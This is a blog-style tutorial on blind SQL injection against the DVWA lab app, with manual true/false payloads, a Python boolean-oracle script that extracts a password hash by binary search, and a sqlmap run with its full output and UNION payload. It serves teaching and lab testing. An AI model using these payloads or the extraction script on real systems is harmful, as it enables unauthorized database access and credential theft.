Test blind sql injection

Blind SQL injection
A web application that is vulnerable to SQL injection may display a SQL error like this one:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

The error tells the attacker two things: the input reaches a SQL query unescaped, so the application is injectable, and the back-end DBMS is MySQL.

When the application suppresses such errors (and does not otherwise print the query's results), an injection attempt gives no direct feedback. Exploiting this is known as blind SQL injection: the attacker infers the outcome of each query from a side channel, typically a true/false difference in the page's behaviour or a time delay.
Reference: OWASP – Blind SQL injection.

Manual testing

A manual test starts by submitting deliberately broken syntax: a single a' in the User ID field. No SQL syntax error appears on the page, so from this alone it is hard to tell whether the parameter is injectable; a further test with a syntactically complete query is needed.


Testing with a syntactically complete query such as ' or 1=1# instead returns data, because 1=1 is always true and the WHERE clause matches every row. To confirm the injection rather than rely on a single response, pair it with a false condition (' and 1=2#) and check that the two responses differ; that difference is the only signal a blind injection gives.
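The true/false behaviour described above, as an added example that is not DVWA's code or the post's own: a Python script in which an in-memory SQLite table (constructed here) stands in for DVWA's MySQL users table, a lookup concatenates the input into its query and swallows every SQL error, an oracle turns the "row found / not found" response into one bit per request, and a binary search recovers a column value at seven requests per ASCII character. The sample rows, the names lookup_vulnerable, lookup_safe, Oracle and extract, and SQLite's unicode() and "-- " in place of MySQL's ASCII() and # are this example's assumptions.

```python
"""Boolean-based blind SQL injection, end to end: a lookup that hides SQL errors,
a true/false oracle built on its 'row found / not found' response, and
character-by-character extraction.  Added example, not DVWA's or the post's code;
an in-memory SQLite table (constructed below) stands in for DVWA's MySQL users table."""
import sqlite3

# Constructed sample rows (assumption): two users with MD5 password hashes.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
    CREATE TABLE users(id INTEGER, first_name TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin',   '5f4dcc3b5aa765d61d8327deb882cf99');
    INSERT INTO users VALUES (2, 'gordonb', 'e99a18c428cb38d5f260853678922e03');
""")


def lookup_vulnerable(user_id: str) -> bool:
    """Mimics the DVWA blind page: input concatenated into the query and every
    SQL error swallowed, so the client only learns whether a row came back."""
    sql = f"SELECT first_name FROM users WHERE id = '{user_id}'"
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # no error text reaches the client: this is what makes it blind


def lookup_safe(user_id: str) -> bool:
    """Hardened counterpart: a bound parameter never reaches the SQL parser."""
    row = _conn.execute("SELECT first_name FROM users WHERE id = ?", (user_id,)).fetchone()
    return row is not None


class Oracle:
    """One 'request' to the target per call; counts requests so the cost per
    character is visible.  Returns True iff the injected condition held."""

    def __init__(self, lookup):
        self.lookup = lookup
        self.requests = 0

    def __call__(self, condition: str) -> bool:
        self.requests += 1
        # DVWA/MySQL form would be  id=a' OR (condition)#  ; '-- ' is the SQLite comment.
        return self.lookup(f"a' OR ({condition}) -- ")


def extract(expr: str, oracle, max_len: int = 64) -> str:
    """Recover the text value of SQL expression `expr` one character at a time.

    Each character is found by binary search over the ASCII range 0..127, so it
    costs exactly 7 oracle requests; detecting the end of the string costs 7 more.
    SQLite's unicode(substr(...)) plays the role of MySQL's ASCII(SUBSTRING(...)):
    comparing code points rather than strings sidesteps MySQL's case-insensitive
    default collation, under which 'a' = 'A' would break the search.
    """
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() is '' and unicode('') is NULL, so every
            break    # comparison is false and the search collapses to 0
        out += chr(lo)
    return out


if __name__ == "__main__":
    # The manual tests from the post: broken syntax shows nothing; a true/false pair differs.
    print("a'            ->", lookup_vulnerable("a'"))
    print("a' OR 1=1 --  ->", lookup_vulnerable("a' OR 1=1 -- "))
    print("a' OR 1=2 --  ->", lookup_vulnerable("a' OR 1=2 -- "))

    o = Oracle(lookup_vulnerable)
    secret = extract("SELECT password FROM users WHERE id=1", o)
    print(f"admin hash: {secret} ({o.requests} requests for {len(secret)} chars)")

    s = Oracle(lookup_safe)
    print("parameterised query leaks:", repr(extract("SELECT password FROM users WHERE id=1", s)))
```

The request count is worth watching on a real engagement: a 32-character hash costs 231 page loads here, every one of them in the web server's access log, and a time-based variant, where each request must wait out a SLEEP(), multiplies that by the chosen delay.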

Automated injection example: sqlmap

Use Burp Suite to intercept the HTTP request; the purpose is to find the session cookie (the Tamper Data add-on for Firefox works as well). DVWA only serves the vulnerable page to a logged-in session and reads the security level from a cookie, so sqlmap must send both the PHPSESSID and the security=low value. With the cookie value in hand, run sqlmap against the page like this:

/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"

Set up the Burp Suite proxy; the default listener on 127.0.0.1:8080 is enough.

Configure Firefox (or the browser of your choice) to use the Burp proxy.

Type anything into the User ID box and click Submit; Burp intercepts the request.

Copy the Cookie header from the intercepted request (the security level and PHPSESSID values); sqlmap needs it to complete the test.

The output is below. Note that sqlmap first warns that 'id' appears not to be dynamic and that its heuristic test suggests the parameter might not be injectable, then finds a UNION-based injection with two columns anyway; it can do that because this low-security page reflects query output into the response. Against a target that echoes nothing, only the boolean-based and time-based blind tests listed in the log would fire, and confirming and exploiting the flaw would take far more than the 120 requests used here.


root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://172.16.0.4/dvwa/vulnerabilities/sqli_blind/?id=a&Submit=Submit" --cookie="security=low; PHPSESSID=ut8273jfu66ani571dssd1s6p0"

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:23:43

[23:23:44] [INFO] testing connection to the target url
[23:23:44] [INFO] testing if the url is stable, wait a few seconds
[23:23:45] [INFO] url is stable
[23:23:45] [INFO] testing if GET parameter 'id' is dynamic
[23:23:46] [WARNING] GET parameter 'id' appears to be not dynamic
[23:23:46] [WARNING] reflective value(s) found and filtering out
[23:23:46] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable
[23:23:46] [INFO] testing for SQL injection on GET parameter 'id'
[23:23:46] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:23:46] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:23:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:23:47] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:23:47] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:23:47] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:23:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:23:48] [INFO] testing 'Oracle AND time-based blind'
[23:23:48] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:23:49] [INFO] target url appears to be UNION injectable with 2 columns
[23:23:49] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 120 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=a' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a686b633a,0x61484d4c475865765959,0x3a757a643a)#&Submit=Submit
---

[23:23:55] [INFO] testing MySQL
[23:23:55] [INFO] confirming MySQL
[23:23:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian or Ubuntu 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: MySQL >= 5.0.0
[23:23:55] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/172.16.0.4'

[*] shutting down at 23:23:55

root@bt:/pentest/database/sqlmap# 

This entry was posted in Security, Vulnerability Assessment and Pentest.

2 Responses to Test blind sql injection

  1. K3170Makan says:

    Good post 😉

    There are much faster ways of extracting data via blind injection. As it stands with MySQL DBs, you should be able to extract one character in about 7 requests per character; if you are extracting chars in [a-zA-Z], you should be able to extract them in only 6 requests per char.

    For more check out my blog post on blind MySQL injection —> http://k3170makan.blogspot.com/2012/01/bit-shifting-blind-injection-simplified.html

  2. cyruslab says:

    Hi K3170Makan! Thanks for visiting! I have read your article about bit shifting, but I do not quite get it. I browsed your blog a bit and found you have extensive posts about Google dorking, which are sooo useful and interesting. :D I would like to add your blog to my blogroll. 😀
